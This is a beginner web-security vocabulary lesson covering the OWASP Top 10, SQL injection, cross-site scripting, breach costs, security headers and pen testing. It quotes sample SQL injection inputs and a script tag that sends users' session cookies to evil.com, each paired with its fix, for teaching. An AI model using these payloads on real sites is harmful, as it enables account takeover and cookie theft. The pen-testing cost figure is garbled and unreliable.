HACKUP
Sign up

Create a free account to save your progress

Earn XP, track streaks, and sync your dashboard across devices.

Sign up free
Tech Vocabulary/
Lesson

The OWASPWhat is owasp?Open Web Application Security Project - an organization that maintains a widely used list of the most critical web security risks. Top 10: security's greatest hits

OWASP (Open Web Application Security Project) maintains a list of the most critical web security risks. Here are the big ones:

Injection attacks

Hackers insert malicious code into your application. The most common is SQL injectionWhat is sql injection?An attack where user input is inserted directly into a database query, letting the attacker read, modify, or delete data. Parameterized queries prevent it.: tricking a database into running commands it shouldn't.

Example: A login form expects a username. Instead, an attacker enters: ' OR '1'='1

This becomes: SELECT * FROM users WHERE username = '' OR '1'='1', since 1=1 is always true, the attacker logs in as the first user (usually admin).

Broken authenticationWhat is authentication?Verifying who a user is, typically through credentials like a password or token.

Weak authentication lets attackers impersonate users: unlimited login attempts (brute force), weak password requirements, sessions that don't expire, or credentials sent over HTTPWhat is http?The protocol browsers and servers use to exchange web pages, API data, and other resources, defining how requests and responses are formatted..

Other critical vulnerabilities

RankVulnerabilitySimple explanation
3Sensitive data exposurePasswords in plain text, unencrypted credit cards
4XML External Entities (XXE)Malicious XML files that read server files
5Broken access controlUsers accessing data they shouldn't by changing a URL
6Security misconfigurationDefault passwords, unnecessary features enabled
7Cross-site scripting (XSS)Injecting malicious scripts into web pages
8Insecure deserializationManipulating data objects to run malicious code
9Using vulnerable componentsOutdated libraries with known security holes
10Insufficient loggingNot knowing you were attacked until it's too late

The rule: Never trust the client. Verify permissions on every request.

02

SQL injectionWhat is sql injection?An attack where user input is inserted directly into a database query, letting the attacker read, modify, or delete data. Parameterized queries prevent it. and XSSWhat is xss?Cross-Site Scripting - an attack where malicious JavaScript is injected into a web page and runs in other users' browsers, stealing data or hijacking sessions.: explained in detail

SQL injection: attacking the database

If user input gets inserted directly into SQLWhat is sql?A language for querying and managing data in relational databases, letting you insert, read, update, and delete rows across tables. queries, attackers can modify those queries.

Vulnerable code (pseudo-code):

query = "SELECT * FROM users WHERE username = '" + userInput + "'"

Attack input: admin' --

Resulting query:

SELECT * FROM users WHERE username = 'admin' --'

The -- comments out the restWhat is rest?An architectural style for web APIs where URLs represent resources (nouns) and HTTP methods (GET, POST, PUT, DELETE) represent actions on those resources. of the query, so the password check is skipped.

The fix: Use parameterized queries (prepared statements). Never concatenate user input into SQL.

Cross-site scripting (XSS): attacking other users

XSS injects malicious scripts into web pages that other users see.

Attacker posts in a comment section: <script>document.location='https://evil.com/steal?cookie='+document.cookie</script>

When other users view the comment, their browser runs the script and sends their sessionWhat is session?A server-side record that tracks a logged-in user. The browser holds only a session ID in a cookie, and the server looks up the full data on each request. cookieWhat is cookie?A small piece of data the browser stores and automatically sends with every request to the matching server, often used for sessions. to the attacker.

Types of XSS:

  • Stored XSS: malicious script saved to the database
  • Reflected XSS: script is in the URL, reflected back immediately
  • DOMWhat is dom?The Document Object Model - the browser's live representation of your HTML page as a tree of objects that JavaScript can read and modify.-based XSS: script manipulates the page structure directly

The fix: Sanitize all user input. Escape special characters. Use modern frameworks that do this automatically.

AI pitfall
AI code generators frequently build SQL queries by concatenating user input directly into query strings, producing code vulnerable to injection out of the box. Always review AI-generated database code for parameterized queries.
03

When breaches happen: the real cost

Data breaches cost millions in fines (GDPRWhat is gdpr?A European regulation that gives users control over their personal data, including the right to access, delete, and export it.: up to 4% of global revenue), lawsuits, forensic investigations, and downtime. The hidden costs, reputation damage, employee burnout, and technical debtWhat is technical debt?Shortcuts or compromises in code that save time now but create extra work later when you need to change or extend it. from rushed patches, often exceed the direct costs.

Famous breaches

CompanyYearCauseImpact
Equifax2017Unpatched server147 million records, $700M+ settlement
Target2013Vendor credentials stolen40 million credit cards, $290M costs
Yahoo2013-14State-sponsored attack3 billion accounts, $350M off sale price
Marriott2018Acquired compromised system500 million guests, £18M GDPR fine
The lesson
Security isn't a feature you add later. The cost of prevention is always less than the cost of a breach.
04

Security headers: the easy wins

Web servers can send headers that tell browsers how to behave, one-line configurations that prevent whole classes of attacks.

HeaderWhat it doesWhy it matters
Content-Security-PolicyRestricts what resources can loadPrevents XSS by blocking inline scripts
X-Frame-OptionsPrevents page from being embeddedStops clickjacking attacks
X-Content-Type-OptionsPrevents MIME type sniffingStops browsers from executing disguised files
Strict-Transport-SecurityForces HTTPS for a periodPrevents downgrade attacks
Referrer-PolicyControls referrer informationLimits data leakage
05

Penetration testing: ethical hacking

Penetration testing (pen testing) is hiring security experts to attack your system before real attackers do.

Three types: Black box (testers know nothing), gray box (limited knowledge), white box (full access to source code).

The process: Reconnaissance, scanning, exploitation, post-exploitation, then a report with findings and remediation steps.

Good to know
Pen testing costs CALLOUT0K-CALLOUT00K+ depending on scope. For smaller budgets, consider bug bounty programs where researchers are paid per vulnerability found.
06

Security by design

Core principles

  • Least privilege: Give users the minimum access they need
  • Defense in depth: Multiple layers of protection, not a single measure
  • Fail securely: When something breaks, fail to a secure state
  • Don't trust user input: Validate everything server-side

Security in the development lifecycle

PhaseSecurity activity
DesignThreat modeling, security requirements
DevelopmentSecure coding training, code reviews
TestingAutomated security scans, pen testing
DeploymentSecurity configuration review
OperationsMonitoring, incident response plans
Done